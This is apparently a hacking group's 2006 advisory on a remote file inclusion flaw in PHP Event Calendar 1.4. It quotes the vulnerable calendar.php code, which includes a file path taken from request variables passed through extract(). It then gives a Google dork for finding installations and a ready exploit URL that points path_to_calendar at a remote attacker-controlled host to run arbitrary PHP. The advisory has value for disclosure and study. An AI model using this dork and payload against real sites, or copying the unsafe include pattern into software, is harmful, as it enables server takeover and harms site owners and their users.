#############################SolpotCrew Community################################ # # PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion # # Vendor site : http://www.softcomplex.com/products/php_event_calendar/ # ################################################################################# # # # Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006) # # contact: chris_hasibuan@xxxxxxxxx # # Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt # ################################################################################ # # # Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja , # L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa # home_edition2001 , Anggands , Rendy , cow_1seng # and all crew #mardongan @ irc.dal.net # # ############################################################################### Input passed to the "path_to_calendar" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from calendar.php if(!$path_to_calendar){ $path_to_calendar = $_path_to_calendar; } extract($HTTP_POST_VARS); extract($HTTP_GET_VARS); include_once $path_to_calendar.'db.php'; function show_calendar($index_calendar='') { global $db,$path_to_data,$settings; Google dork : inurl:/cl_files/ exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode ##############################MY LOVE JUST FOR U RIE######################### ######################################E.O.F##################################
